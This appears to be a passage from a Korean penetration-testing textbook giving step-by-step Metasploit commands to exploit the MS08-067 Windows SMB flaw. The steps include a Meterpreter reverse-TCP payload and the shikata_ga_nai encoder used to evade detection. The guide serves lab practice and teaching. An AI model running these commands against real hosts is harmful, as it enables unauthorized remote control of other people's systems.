3.1.4 메타스플로이트 사용해 MS08-067 취약점 공격

1. 칼리 리눅스에서 메타스플로이트를 실행한다. 터미널을 열고 다음 명령을 입력한다.

msfconsole

2. 다음 명령을 실행하여 취약점을 검색한다.

search ms08-067

3. 검색 결과에서 취약점을 선택한다.

use exploit/windows/smb/ms08_067_netapi

4. 선택한 취약점 옵션을 조회한다.

show options

5. IP 정보를 설정한다.

set RHOST [공격 대상 윈도 호스트 IP]

set LHOST [여러분 컴퓨터 IP]

6. 사용할 페이로드와 인코더를 선택한다(페이로드 종류를 자세히 알고 싶다면 http://www.offensive-security.com/metasploit-unleashed/Payload_Types를 참고한다).

set PAYLOAD windows/meterpreter/reverse_tcp

set ENCODER x86/shikata_ga_nai

7. 공격을 수행한다.

exploit

▲ 그림 3-1 메타스플로이트

 

지금까지 메타스플로이트의 기본 내용을 살펴봤는데, 실제 공격을 시도하기 전에 윈도와 리눅스 머신에서 충분히 실습하자.